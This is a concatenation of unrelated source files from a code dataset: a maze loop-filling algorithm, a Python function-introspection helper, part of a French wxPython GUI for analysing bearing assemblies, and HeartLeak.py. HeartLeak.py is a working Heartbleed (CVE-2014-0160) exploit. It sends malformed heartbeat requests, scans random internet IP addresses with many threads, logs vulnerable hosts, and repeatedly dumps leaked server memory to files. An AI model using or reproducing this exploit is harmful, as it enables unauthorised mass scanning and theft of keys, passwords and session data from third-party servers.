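  init_lr, warmup_lr, warmup_steps = 0.08, 0.0067, 500
  levels, boundaries = [0.008, 0.0008], [15000, 20000]

  def lr_at(step):
    # mirrors step_learning_rate_with_linear_warmup without TF ops
    lr = warmup_lr + float(step) / warmup_steps * (init_lr - warmup_lr)
    if step >= warmup_steps:
      lr = init_lr
    for next_lr, start in zip(levels, boundaries):
      if step >= start:
        lr = next_lr
    return lr

  assert abs(lr_at(0) - warmup_lr) < 1e-9           # warmup starts low
  assert abs(lr_at(warmup_steps) - init_lr) < 1e-9  # warmup ends at init_lr
  assert abs(lr_at(15000) - 0.008) < 1e-9           # first decay level
  assert abs(lr_at(25000) - 0.0008) < 1e-9          # second decay level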
|
apache-2.0
| -1,571,703,288,276,951,000 | 42.623529 | 80 | 0.598166 | false |
theJollySin/mazelib
|
mazelib/transmute/CuldeSacFiller.py
|
1
|
3054
|
# If the code is not Cython-compiled, we need to add some imports.
from cython import compiled
if not compiled:
from mazelib.transmute.MazeTransmuteAlgo import MazeTransmuteAlgo
class CuldeSacFiller(MazeTransmuteAlgo):
""" This algorithm could be called LoopFiller, because it breaks up loop in the maze.
1. Scan the maze, looking for cells with connecting halls that go in exactly two directions.
2. At each of these places, travel in both directions until you find your first intersection.
3. If the first intersection for both paths is the same, you have a loop.
4. Fill in the cell you started at with a wall, breaking the loop.
"""
def _transmute(self):
""" Master methot to fill in all the loops in the maze
Returns: None
"""
for r in range(1, self.grid.shape[0], 2):
for c in range(1, self.grid.shape[1], 2):
if (r, c) in (self.start, self.end):
# we don't want to block off an exit
continue
elif self.grid[(r, c)] == 1:
# it's a wall, who cares
continue
# determine if we could even possibly be in a loop
ns = self._find_unblocked_neighbors((r, c))
if len(ns) != 2:
continue
# travel in both directions until you hit the first intersection
try:
end1 = self._find_next_intersection([(r, c), ns[0]])
end2 = self._find_next_intersection([(r, c), ns[1]])
except AssertionError:
continue
# Found a loop!
if end1 == end2:
self.grid[(r, c)] = 1
def _find_next_intersection(self, path_start):
""" Starting with the first two cells in a path, follow the path until you hit the next
intersection (or dead end)
Args:
path_start (list): the first two cells (tuples) in the path you want to travel
Returns:
tuple: the location of the first intersection (or dead end) in the maze
"""
assert len(path_start) == 2, "invalid starting path to travel"
# save off starting positions for comparisons later
first = path_start[0]
previous = path_start[0]
current = path_start[1]
# keep traveling until you hit an intersection
ns = self._find_unblocked_neighbors(current)
while len(ns) == 2:
# travel away from where you came from
if ns[0] == previous:
previous = current
current = ns[1]
else:
previous = current
current = ns[0]
# Edge Case: You looped without finding ANY intersections? Eww.
if current == first:
return previous
# look around for you next traveling position
ns = self._find_unblocked_neighbors(current)
return current
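# A minimal usage sketch, assuming mazelib's public Maze/Prims API (the 4x4
# size is arbitrary): generate a maze, then break any loops with this class.
#
#     from mazelib import Maze
#     from mazelib.generate.Prims import Prims
#
#     m = Maze()
#     m.generator = Prims(4, 4)
#     m.generate()
#     m.transmuters = [CuldeSacFiller()]
#     m.transmute()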
|
gpl-3.0
| 9,002,926,573,663,842,000 | 37.1875 | 97 | 0.562541 | false |
Nekmo/nekutils
|
survey.py
|
1
|
1674
|
# coding=utf-8
from inspect import getargspec
from .iter import append_or_update
def kwargs_function(function):
    argspec = getargspec(function)
    if not argspec.defaults:  # no defaulted (keyword) arguments at all
        return {}
    kwarg_names = argspec.args[-len(argspec.defaults):]
    return {kwarg_name: argspec.defaults[i] for i, kwarg_name in enumerate(kwarg_names)}
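# For example, given a hypothetical `def send(msg, retries=3, timeout=1.5)`,
# kwargs_function(send) returns {'retries': 3, 'timeout': 1.5}.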
class InspectFunction(object):
vargs = None
keywords = None
def __init__(self):
self.arg_types = []
self.kwarg_types = []
def set_arg_types(self, arg_types):
append_or_update(self.arg_types, arg_types)
def set_kwarg_types(self, kwarg_types):
append_or_update(self.kwarg_types, kwarg_types)
def set_from_function(self, function):
argspec = getargspec(function)
self.vargs = argspec.varargs
self.keywords = argspec.keywords
arg_types, kwargs_types = argspec.args, argspec.defaults
if kwargs_types:
append_or_update(self.kwarg_types, map(self.get_type, kwargs_types), False)
        # add the argument if there is none for that position; otherwise leave it unchanged
        # subtract 1 because the first argument is "msg", the Msg object
arg_types = arg_types if not kwargs_types else arg_types[:-len(kwargs_types)]
append_or_update(self.arg_types, [str] * (len(arg_types) - 1), False)
def get_type(self, value):
if hasattr(value, '__call__'):
return value
elif hasattr(value.__class__, '__call__'):
return value.__class__
else:
return str
def get_type_name(self, type):
try:
return type.__name__
except Exception:
return type.__class__.__name__
|
mit
| 3,462,597,411,575,574,000 | 32.46 | 88 | 0.619019 | false |
OffensivePython/HeartLeak
|
HeartLeak.py
|
1
|
8184
|
#!/usr/bin/env python27
#=========================================================#
# [+] Title: HeartLeak (CVE-2014-0160) #
# [+] Script: HeartLeak.py #
# [+] Twitter: https://twitter.com/OffensivePython #
# [+] Blog: http://pytesting.blogspot.com #
#=========================================================#
import socket
import struct
import sys
import time
import random
import threading
from optparse import OptionParser
class heartleak(object):
    def __init__(self, host, port=443, verbose=False):
        self.connected=False
        try:
            self.sick=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.sick.connect((host, port))
        except socket.error:
            # a plain return from __init__ still yields a (truthy) instance,
            # so callers are guarded by the self.connected flag instead
            return
        self.connected=True
self.hello="\x16\x03\x02\x00\xdc\x01\x00\x00\xd8\x03\x02\x53\x43\x5b\x90\x9d"
self.hello+="\x9b\x72\x0b\xbc\x0c\xbc\x2b\x92\xa8\x48\x97\xcf\xbd\x39\x04\xcc"
self.hello+="\x16\x0a\x85\x03\x90\x9f\x77\x04\x33\xd4\xde\x00\x00\x66\xc0\x14"
self.hello+="\xc0\x0a\xc0\x22\xc0\x21\x00\x39\x00\x38\x00\x88\x00\x87\xc0\x0f"
self.hello+="\xc0\x05\x00\x35\x00\x84\xc0\x12\xc0\x08\xc0\x1c\xc0\x1b\x00\x16"
self.hello+="\x00\x13\xc0\x0d\xc0\x03\x00\x0a\xc0\x13\xc0\x09\xc0\x1f\xc0\x1e"
self.hello+="\x00\x33\x00\x32\x00\x9a\x00\x99\x00\x45\x00\x44\xc0\x0e\xc0\x04"
self.hello+="\x00\x2f\x00\x96\x00\x41\xc0\x11\xc0\x07\xc0\x0c\xc0\x02\x00\x05"
self.hello+="\x00\x04\x00\x15\x00\x12\x00\x09\x00\x14\x00\x11\x00\x08\x00\x06"
self.hello+="\x00\x03\x00\xff\x01\x00\x00\x49\x00\x0b\x00\x04\x03\x00\x01\x02"
self.hello+="\x00\x0a\x00\x34\x00\x32\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c"
self.hello+="\x00\x18\x00\x09\x00\x0a\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07"
self.hello+="\x00\x14\x00\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02"
self.hello+="\x00\x03\x00\x0f\x00\x10\x00\x11\x00\x23\x00\x00\x00\x0f\x00\x01"
self.hello+="\x01"
self.hb="\x18\x03\x02\x00\x03\x01\xFF\xEC"
self.verbose=verbose
def receive(self, op):
data=''
chunk=''
typ, version, length = None, None, None
try:
data=self.sick.recv(5)
except socket.error:
return None, None, None
if data:
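            # 5-byte TLS record header: content type (1 byte), protocol
            # version (2 bytes) and payload length (2 bytes), big-endian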
typ, version, length = struct.unpack('>BHH', data)
if typ==None:
return None, None, None
else:
if op==1: # handshake
data=self.sick.recv(length)
else: # heartbeat
                # receive all data sent by the server
while True:
try:
chunk = self.sick.recv(0xFFFF)
data+=chunk
except socket.error:
break
return typ, version, data
else:
return None, None, None
def handshake(self):
        if not self.connected:
            return None
        self.sick.send(self.hello) # send handshake
while True:
if self.verbose:
print("[+] Sending SSL Handshake")
typ, version, payload = self.receive(1)
if typ==None:
if self.verbose:
print("[-] Host doesn't support OpenSSL")
return None
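            # content type 22 = handshake; first byte 0x0E = ServerHelloDone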
if typ==22 and ord(payload[0])==0x0E:
if self.verbose:
print("[+] Received Hello back")
# Received hello back
break
return True
def heartbeat(self):
if self.verbose:
print("[+] Sending malicious heartbeat request")
self.sick.send(self.hb)
while True:
typ, version, payload = self.receive(2)
if typ==None or typ==21:
return False
if typ==24:
if len(payload)>3:
return payload
else:
return False
def destroy(self):
""" Close connection """
if self.verbose:
print("[+] Closing Connection")
self.sick.close()
def leakTest(hFile, host, port=443):
global n
sick=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sick.connect((host, port))
sick.close()
print("[+] %s supports SSL, trying to trigger the bug"%host)
        target=heartleak(host, port)
if target and target.handshake():
if target.heartbeat():
print("-{#}-- %s is vulnerable -{#}--"%host)
if port==443:
hFile.write(host+'\r\n')
else:
hFile.write(host+":"+port+'\r\n')
n-=1
if n>0:
print("[+] Still looking for %d vulnerable hosts"%n)
target.destroy()
except socket.error:
sick.close()
pass
def scan(nhost, port, nthread):
hFile=open("heartleaked.log", "a")
global n
print("[+] Running a scan to find %d vulnerable host(s). Be patient!"%nhost)
n=nhost
while n>0:
try:
ip=randomHost()
try:
while threading.activeCount()>nthread:
time.sleep(5)
t=threading.Thread(target=leakTest, args=(hFile, ip, port))
t.start()
except:
time.sleep(5)
except KeyboardInterrupt:
print("[-] Cancelled due to keyboard interruption")
break
hFile.close()
return
def getStrings(data):
length=len(data)
printable=''
i=0
while i<length:
j=i
while ord(data[j])>31 and ord(data[j])<127 and j<length-1:
j+=1
if j-i>3: # if found a string of 4 bytes or more
printable+=data[i:j]+"\r\n"
i=j
else:
i+=1
return printable
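# For example, getStrings("\x00\x01user=admin\x02\x03") yields "user=admin\r\n";
# printable runs shorter than 4 characters are discarded.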
def monitor(host, port):
print("-{# Sniffing data from %s"%host)
print("-{# Printable data will be stored in %s"%host+".txt")
print("-{# Raw data will be stored in %s"%host+".bin")
ascii=open(host+".txt", "a")
binary=open(host+".bin", "wb")
while True:
target=heartleak(host, port, verbose=True)
if target and target.handshake():
try:
leaked=target.heartbeat()
binary.write(leaked)
strings=getStrings(leaked)
ascii.write(strings)
print(strings)
time.sleep(10)
except KeyboardInterrupt:
target.destroy()
break
ascii.close()
binary.close()
def randomHost():
""" Generates a random IP address """
host=str(random.randint(0,255))
host+="."+str(random.randint(0,255))
host+="."+str(random.randint(0,255))
host+="."+str(random.randint(0,255))
return host
def main():
usage="Usage: %prog arg [options]\n"
usage+="Example:\n"
usage+=" %prog monitor --server=example.com\n"
usage+=" %prog scan --nhost=10 --threads=50\n"
parser=OptionParser(usage)
parser.add_option("-n", "--nhost", dest="nhost", type="int",
help="Number of Hosts", default=1)
parser.add_option("-t", "--threads", dest="nthread", type="int",
help="Number of threads (Default: 10 threads)",
default=10)
parser.add_option("-s", "--server", dest="host", type="string",
help="Target (IP Address) to monitor")
parser.add_option("-p", "--port", dest="port", type="int",
help="Port number (default: 443)", default=443)
options, args=parser.parse_args()
socket.setdefaulttimeout(10)
if len(args)>0:
port=options.port
if args[0]=="scan":
nhost=options.nhost
nthread=options.nthread
scan(nhost, port, nthread)
elif args[0]=="monitor" and options.host:
host=options.host
monitor(host, port)
else:
parser.print_help()
else:
parser.print_help()
if __name__=="__main__":
main()
|
mit
| -6,978,767,676,816,364,000 | 33.825532 | 86 | 0.516984 | false |
cedrick-f/pyVot
|
src/Analyse.py
|
1
|
198562
|
#!/usr/bin/env python
# -*- coding: ISO-8859-1 -*-
##This file is part of PyVot
#############################################################################
#############################################################################
## ##
## Analyse ##
## ##
#############################################################################
#############################################################################
## Copyright (C) 2006-2009 Cédrick FAURY
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import wx # This module uses the new wx namespace
import wx.lib.buttons as buttons
import wx.lib.stattext as st
import wx.grid as gridlib
#from wx.lib.wordwrap import wordwrap
#from textwrap import fill
import Const
import globdef
from globdef import *
import Montage
import Images, Icones
import time
from math import sin,pi,cos
from Affichage import DCPlus
StyleText = {}
Couleur = {}
def charger_styleText():
Couleur["rouge"] = wx.RED
Couleur["vert"] = wx.ColourDatabase().Find("FOREST GREEN")
Couleur["bleu"] = wx.BLUE
StyleText["Titre1"] = Const.StyleDeTexte(wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD, True),wx.BLUE)
StyleText["Titre2"] = Const.StyleDeTexte(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.NORMAL, False),wx.BLACK)
StyleText["Messag"] = Const.StyleDeTexte(wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD, False),wx.RED)
StyleText["Normal"] = Const.StyleDeTexte(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.NORMAL, False),wx.BLACK)
StyleText["Message"] = Const.StyleDeTexte(wx.Font(8, wx.DEFAULT, wx.ITALIC, wx.NORMAL, False),wx.BLACK)
StyleText["Gras"] = Const.StyleDeTexte(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD, False),wx.BLACK)
#####################################################
# Results area  ####################################
#####################################################
class ZoneResultats(wx.Panel):
def __init__(self, parent, analyse, liaison = True):
wx.Panel.__init__(self, parent, -1)
# style=wx.NO_FULL_REPAINT_ON_RESIZE)
self.parent = parent
self.analyse = analyse
# print self.analyse
        # Main sizer
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.boutons = {}
self.statBox = {}
self.statBoxSizer = {}
self.boutonSizer = {}
if liaison and analyse.montageVide:
self.MessagePasDeRoulement()
self.Bind(wx.EVT_BUTTON, self.OnClick)
############################################################
def MessagePasDeRoulement(self):
StyleText["Message"].applique(self, wx.BLACK)
txt = StaticTextWrapped(self, -1, u"Il faut au moins un roulement pour faire une liaison pivot !",
style = wx.ALIGN_CENTRE)
self.sizer.Add(txt) #, (0,0), (1,1), wx.ALIGN_CENTRE|wx.ALIGN_BOTTOM)
self.SetSizerAndFit(self.sizer)
#############################################################
def OnClick(self, event):
return
#############################################################
def MakeStaticBox(self, id, titre, style = wx.VERTICAL):
StyleText["Titre1"].applique(self)
self.statBox[id] = wx.StaticBox(self, -1, titre)
self.statBoxSizer[id] = wx.StaticBoxSizer(self.statBox[id], style)
self.sizer.Add(self.statBoxSizer[id], flag = wx.ALIGN_CENTRE|wx.EXPAND)
def MakeBoutonSizer(self, id, h = 1, v = 1):
self.boutonSizer[id] = wx.GridBagSizer(h,v)
self.statBoxSizer[id].Add(self.boutonSizer[id], flag = wx.ALIGN_CENTRE)
# self.Add(id, self.boutonSizer[id])
def StaticTextMessage(self, message, style = "Messag", wrapFact = None):
StyleText[style].applique(self, Couleur[message.coul])
stw = StaticTextWrapped(self, -1, message.mess)
if wrapFact != None:
stw.SetWrapFact(wrapFact)
return stw
def Add(self, id, objet, flag = wx.ALIGN_CENTRE_VERTICAL|wx.ALIGN_LEFT|wx.TOP|wx.BOTTOM, border = 10):
self.statBoxSizer[id].Add(objet, flag = flag, border = border)
def AddBouton(self, id, objet, pos, span = (1,1), flag = wx.ALIGN_CENTRE):
self.boutonSizer[id].Add(objet, pos, span, flag = flag)
#####################################################
# Axial immobilization ##############################
#####################################################
class ZoneImmobAx(ZoneResultats):
def __init__(self, parent, analyse):
# print "Zone ImmobAx"
        ZoneResultats.__init__(self, parent, analyse)
# style=wx.NO_FULL_REPAINT_ON_RESIZE)
# print analyse.chaineAct[0]
if analyse.montageVide:
return
self.Freeze()
self.labels = {}
self.MakeStaticBox("1", u"Mise en position axiale")
        # Main result
#####################
self.Add("1", self.StaticTextMessage(analyse.messageImmobilisation))
        # Buttons
#####################
self.MakeBoutonSizer("1", 4,10)
c = 0
        for s in [1,0]: # the two directions ...
sizerResult = wx.BoxSizer(wx.VERTICAL)
for mess in analyse.resultatImmobilisation[s]:
sizerResult.Add(self.StaticTextMessage(mess, style = "Normal", wrapFact = 2))
self.AddBouton("1", sizerResult,
(0,c), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
# Bouton "Animer"
#----------------
# if True:#parent.master.options.proposerAnimArret.get() == 1 \
if analyse.resultatImmobilisation[s][0].clef == 'ArretArbreSens':
tag = "Arret"+ str(s)
self.boutons[tag] = buttons.ThemedGenBitmapButton(self, 10+s ,
Images.Img_BoutonMont(tag),
style = wx.BORDER_NONE)
self.boutons[tag].SetToolTipString(Const.bulles['AnalyAnim'])
# Bouton "Chaine"
#----------------
# elif True:#parent.master.options.proposerChaines.get() == 1 \
elif analyse.resultatImmobilisation[s][0].clef == 'ImmobCorrect':
tag = "Chaine"+ str(s)
self.boutons[tag] = buttons.ThemedGenBitmapToggleButton(self, 20+s,
None,
style = wx.BORDER_NONE)
self.boutons[tag].SetBitmapLabel(Images.Img_BoutonMont(tag))
self.boutons[tag].SetInitialSize()
self.boutons[tag].SetToolTipString(Const.bulles['AnalyChai'])
            # Place the widgets ...
#-------------------------
if self.boutons.has_key(tag):
self.AddBouton("1", self.boutons[tag], (1,c), (1,2))
# sizerBoutons.Add(self.boutons[tag], (1,c), (1,2), flag = wx.ALIGN_CENTRE)
# # Label "Hyperstatique"
# #----------------------
## if parent.master.options.proposerChaines.get() == 1 \
# if len(analyse.resultatImmobilisation[s])>1:
# StyleText["Messag"].applique(self, analyse.resultatImmobilisation[s][1].coul)#"bleu")
# self.labels["Hyper"] = wx.StaticText(self, -1,
# analyse.resultatImmobilisation[s][1].mess)
# self.AddBouton("1", self.labels["Hyper"], (3,c), (1,2))
## sizerBoutons.Add(self.labels["Hyper"], (3,c), (1,2), flag = wx.ALIGN_CENTRE)
# self.labels["Hyper"].SetToolTipString(Const.bulles['AnalyHypr'])
tag = None
c += 2
        # Structure diagram
#--------------------
self.MakeStaticBox("2", u"Schéma de structure")
self.Add("2", wx.StaticBitmap(self, -1, analyse.imageSchema),
flag = wx.ALIGN_CENTRE, border = 0)
self.SetSizerAndFit(self.sizer)
self.Thaw()
self.Refresh()
def initAffichage(self, zmont = None):
for b in self.boutons.values():
if isinstance(b, buttons.ThemedGenBitmapToggleButton):
self.OnClick(id = b.GetId(), act = False)
b.SetToggle(False)
# def OnSize(self, event = None):
## print self.GetClientSizeTuple()[0]
# self.txt.SetLabel(self.txt.GetLabel().replace('\n',' '))
## self.txt.SetLabel(self.mess)
# self.txt.Wrap(self.GetClientSizeTuple()[0])
## self.txt.Wrap(-1)
# self.Fit()
# event.Skip()
def OnClick(self, event = None, id = None, act = None):
if id is None: id = event.GetId()
# print "Click",id, act
if id in [10,11]:
self.parent.animerElemNonArretes(id-10)
elif id in [20,21]:
if act is None: act = event.GetIsDown()
self.parent.gererAffichageChaines(id-20, act )
#####################################################
# Load resistance ###################################
#####################################################
class ZoneResistance(ZoneResultats):
def __init__(self, parent, analyse):
ZoneResultats.__init__(self, parent, analyse)
if analyse.montageVide:
return
self.Freeze()
        # Axial load resistance of the assembly
#####################################################
self.MakeStaticBox("1", u"Résistance axiale du montage")
        # Main result
self.Add("1", self.StaticTextMessage(analyse.messageResistanceAxiale))
        # Buttons
self.MakeBoutonSizer("1", 4,10)
self.listeActive = {}
for s in [1,0]:
            c = 1-s # column index in sizerMtg
sizerResult = wx.BoxSizer(wx.VERTICAL)
for mess in analyse.resultatEffortAxialMtg[s]:
sizerResult.Add(self.StaticTextMessage(mess, style = "Normal", wrapFact = 2))
self.AddBouton("1", sizerResult,
(0,c), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
# Bouton "Détail"
#----------------
# if parent.master.options.proposerChaines.get() == 1 \
if analyse.resultatEffortAxialMtg[s][0].clef == 'ElemResistPas':
tag = "_Chaine"+ str(s)
if True:#master.master.options.proposerChaines.get() <> 0 :
self.boutons["_"+tag] = buttons.ThemedGenBitmapToggleButton(self, 30+s,
Images.Img_BoutonMont(tag),
style = wx.BORDER_NONE)
self.boutons["_"+tag].SetInitialSize()
self.boutons["_"+tag].SetToolTipString(Const.bulles['AnalyChai'])
# self.listeActive[s] = ListeActive(self, self.lstNom(s), self.boutons["_"+tag])
# self.listeActive[s].SetToolTipString(Const.bulles['SelectRoul'])
# self.AddBouton("1", self.listeActive[s].symboleDevelop, (1,c),(1,1),
# wx.ALIGN_CENTRE|wx.ALIGN_BOTTOM)
# self.AddBouton("1", self.listeActive[s], (2+c,0), (1,2),
# wx.ALIGN_CENTRE|wx.ALIGN_TOP)
rr = 2
# Bouton "Chaine"
#----------------
# elif parent.master.options.proposerChaines.get() == 1 \
elif analyse.resultatEffortAxialMtg[s][0].clef in ['ChargeAxOk']:
tag = "Chaine"+ str(s)
if True:#parent.master.options.proposerChaines.get() <> 0 :
self.boutons["_"+tag] = buttons.ThemedGenBitmapToggleButton(self, 20+s,
None,
style = wx.BORDER_NONE)
self.boutons["_"+tag].SetBitmapLabel(Images.Img_BoutonMont(tag))
self.boutons["_"+tag].SetInitialSize()
self.boutons["_"+tag].SetToolTipString(Const.bulles['AnalyChai'])
# Bouton "Animer"
#----------------
# elif parent.master.options.proposerAnimArret.get() == 1 \
elif analyse.resultatEffortAxialMtg[s][0].clef == 'ArretArbreSens':
tag = "Arret"+ str(s)
self.boutons["_"+tag] = buttons.ThemedGenBitmapButton(self, 10+s,
Images.Img_BoutonMont(tag),
style = wx.BORDER_NONE)
self.boutons["_"+tag].SetInitialSize()
self.boutons["_"+tag].SetToolTipString(Const.bulles['AnalyAnim'])
            # Place the widgets ...
#-------------------------
if self.boutons.has_key("_"+tag):
self.AddBouton("1", self.boutons["_"+tag], (1,c), (1,1), wx.ALIGN_CENTRE)
tag = None
        # Bearing load resistance
########################################################################
self.MakeStaticBox("2", u"Résistance des roulements")
        # General message
self.Add("2", self.StaticTextMessage(analyse.messageResistanceRlt), border = 10)
        # Structure diagram
self.Add("2", wx.StaticBitmap(self, -1, analyse.imageSchemaCharges),
flag = wx.ALIGN_CENTRE, border = 0)
        # Per-bearing messages
# self.MakeBoutonSizer("2",1,20)
table = Tableau(self)
table.SetColLabelValue(0, u"Roulement gauche")
table.SetColLabelValue(1, u"Roulement droit")
table.SetRowLabelSize(1)
table.SetRowLabelAlignment(wx.ALIGN_RIGHT, wx.ALIGN_CENTRE)
# table.SetRowLabelValue(0, u"Type\nde charge")
# table.SetRowLabelValue(1, u"Résistance\ndu roulement")
c = 0
for p in ["G","D"]:
l = 0
if analyse.resultatResistanceRlt[p] is not None:
table.SetCellValue(1,c, Const.typeCharge[analyse.typeCharge[p]])
table.SetCellTextColour(1,c, wx.BLACK)
if analyse.typeCharge[p] <> 0:
table.SetCellValue(0,c, analyse.resultatResistanceRlt[p].mess)
table.SetCellTextColour(0,c, Couleur[analyse.resultatResistanceRlt[p].coul])
c += 1
table.Fit()
table.ForceRefresh()
size = 0
for c in range(table.GetNumberCols()):
if size < table.GetColSize(c):
size = table.GetColSize(c)
colmax = c
# print colmax, table.GetColSize(colmax)
table.SetColSize(1-colmax, table.GetColSize(colmax))
# table.SetColSize(table)
table.Fit()
table.ForceRefresh()
# flag = wx.ALIGN_CENTRE_VERTICAL|wx.ALIGN_LEFT|wx.TOP|wx.BOTTOM
self.Add("2", table, flag = wx.ALIGN_CENTRE, border = 0)
self.tableResist = table
# c = 0
# for p in ["G","D"]:
# if analyse.resultatResistanceRlt[p] is not None:
#
# # Type de charge
# #---------------
# StyleText["Titre2"].applique(self)
# txt = wx.StaticText(self, -1, Const.typeCharge[analyse.typeCharge[p]],
# style = wx.ALIGN_CENTRE)
# self.AddBouton("2", txt, (0,c), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
#
# # Label "Résultat"
# #----------------
# if analyse.typeCharge[p] <> 0:
# StyleText["Messag"].applique(self, Couleur[analyse.resultatResistanceRlt[p].coul])
# txt = wx.StaticText(self, -1, analyse.resultatResistanceRlt[p].mess,
# style = wx.ALIGN_CENTRE)
# self.AddBouton("2", txt, (1,c), (1,1), wx.ALIGN_CENTRE|wx.EXPAND)
# c += 1
#
self.SetSizerAndFit(self.sizer)
self.Thaw()
def initAffichage(self, zmont = None):
# print "initAffichage Resistance"
for b in self.boutons.values():
if isinstance(b, buttons.ThemedGenBitmapToggleButton):
self.OnClick(id = b.GetId(), act = False)
b.SetToggle(False)
#############################################################################
def lstNom(self, sens):
message = self.parent.analyse.resultatEffortAxialMtg[sens][1].mess
lst = []
pos = Montage.PositionDansPivot()
for res in self.parent.analyse.lstElemResistePas[sens]:
lst.append(pos.traduireEnTexte(res))
return {'mess' : message, 'lst' : lst}
def OnClick(self, event = None, id = None, act = None):
if id is None: id = event.GetId()
if id in [10,11]:
idOpp = "__Chaine"+ str(11-id)
if self.boutons.has_key(idOpp):
self.boutons[idOpp].SetToggle(False)
self.OnClick(id = 41-id, act = False)
self.parent.animerElemNonArretes(id-10)
elif id in [20,21]:
if act is None: act = event.GetIsDown()
self.parent.gererAffichageChaines(id-20, act)
elif id in [30,31]:
if act is None: act = event.GetIsDown()
self.parent.gererSurBrillanceArrets(id-30, act)
# self.listeActive[id-30].Montrer(act)
self.Layout()
self.Update()
#####################################################
# Mountability ######################################
#####################################################
class ZoneMontabilite(ZoneResultats):
def __init__(self, parent, analyse):
ZoneResultats.__init__(self, parent, analyse)
self.analyse = analyse
if analyse.montageVide:
return
self.Freeze()
#####################################################
        # Main message (overall mountability)
#####################################################
self.txt = self.StaticTextMessage(analyse.resultatMontabilite)
self.sizer.Add(self.txt, flag = wx.ALIGN_CENTRE_VERTICAL|wx.ALIGN_LEFT|wx.TOP|wx.BOTTOM, border = 10)
#####################################################
        # Mountability of the "free" mounted assembly
#####################################################
if analyse.cdcf.bagueTournante == "I": ens = u"""arbre"""
else: ens = u"""alésage"""
self.MakeStaticBox("1", u"Montabilité de l'ensemble " + ens)
self.MakeBoutonSizer("1",0,0)
StyleText["Titre2"].applique(self)
cbs = wx.BoxSizer(wx.HORIZONTAL)
cb = wx.CheckBox(self, -1, " ")
cb.SetValue(analyse.demonterRltSerres)
self.Bind(wx.EVT_CHECKBOX, self.EvtCheckBox, cb)
cbs.Add(cb)
txt = StaticTextWrapped(self, -1, u"Ne pas tenir compte des roulements montés serrés")
txt.marge = 40
cbs.Add(txt)
self.Add("1", cbs)
#####################################################
        # Mountability of the bearings on the tightly fitted assembly
#####################################################
self.MakeStaticBox("2", u"Montabilité des roulements")
self.MakeBoutonSizer("2",0,0)
StyleText["Titre2"].applique(self)
if self.analyse.mtg.palier["G"].rlt.num is not None:
txt = wx.StaticText(self, -1, u"gauche", style = wx.ALIGN_CENTRE)
self.AddBouton("2", txt, (0,0), (1,2), wx.ALIGN_CENTRE|wx.ALIGN_BOTTOM)
if self.analyse.mtg.palier["D"].rlt.num is not None:
txt = wx.StaticText(self, -1, u"droite", style = wx.ALIGN_CENTRE)
self.AddBouton("2", txt, (0,2), (1,2), wx.ALIGN_CENTRE|wx.ALIGN_BOTTOM)
#####################################################
# Options
#####################################################
# self.MakeStaticBox("3", u"Options", wx.HORIZONTAL)
# self.MakeBoutonSizer("3",0,0)
# StyleText["Titre2"].applique(self)
# cb = wx.CheckBox(self, -1, " ")
# cb.SetValue(analyse.demonterRltSerres)
# self.Bind(wx.EVT_CHECKBOX, self.EvtCheckBox, cb)
# self.Add("3", cb)
# txt = StaticTextWrapped(self, -1, u"Ne pas tenir compte des roulements montés sérrés")
# txt.marge = 40
# self.Add("3", txt)#, flag = wx.ALIGN_CENTRE_VERTICAL|wx.ALIGN_LEFT|wx.TOP|wx.BOTTOM|wx.LEFT)
#####################################################
        # All the buttons ...
#####################################################
        # Assembly
dl = 2
for tag, pos in [["AnimEnsb1", (0,0)],
["AnimEnsb0", (0,2)]]:
lstObs = analyse.obstacleEnsble[eval(tag[8])]
# if analyse.obstacleEnsble[eval(tag[8])] <> []:
# lstObs.append(analyse.obstacleEnsble[eval(tag[8])])
# for p in ["G","D"]:
# if analyse.obstacleEnsble[eval(tag[8])][p] <> ():
# lstObs.append(analyse.obstacleEnsble[eval(tag[8])][p])
if lstObs <> []: typeAction = 'obstacle'
else: typeAction = 'demonte'
            # The button ...
self.boutons[tag] = BoutonMontage(self,
tag = tag,
typeAction = typeAction,
analyse = analyse,
lstObs = lstObs)
self.AddBouton("1", self.boutons[tag], pos, flag = wx.ALIGN_CENTRE)
# # La zone "liste active" ...
# if typeAction == 'obstacle':
# self.AddBouton("1", self.boutons[tag].listeActive.symboleDevelop, (pos[0]+1,pos[1]), (1,2),
# wx.ALIGN_CENTRE|wx.ALIGN_BOTTOM)
# self.AddBouton("1", self.boutons[tag].listeActive, (pos[0]+dl, 0), (1,4),
# wx.ALIGN_CENTRE|wx.ALIGN_TOP|wx.EXPAND)
# dl += 1
        # Bearings
dl = 2
for tag, pos in [["AnimRltG0",(1,1)], \
["AnimRltG1",(1,0)], \
["AnimRltD0",(1,3)], \
["AnimRltD1",(1,2)]] :
lstObs = analyse.obstacleRoults[tag[7]][eval(tag[8])]
if lstObs <> []: typeAction = 'obstacle'
else: typeAction = 'demonte'
            # The button ...
if self.analyse.mtg.palier[tag[7]].rlt.num is not None:
self.boutons[tag] = BoutonMontage(self,
tag = tag,
typeAction = typeAction,
analyse = analyse,
lstObs = lstObs)
self.AddBouton("2", self.boutons[tag], pos, flag = wx.ALIGN_CENTRE)
# # La zone "liste active" ...
# if typeAction == 'obstacle':
# self.AddBouton("2", self.boutons[tag].listeActive.symboleDevelop, (pos[0]+1,pos[1]), (1,1),
# wx.ALIGN_CENTRE|wx.ALIGN_BOTTOM)
# self.AddBouton("2", self.boutons[tag].listeActive, (pos[0]+dl, 0), (1,4),
# wx.ALIGN_CENTRE_VERTICAL|wx.ALIGN_TOP|wx.EXPAND)
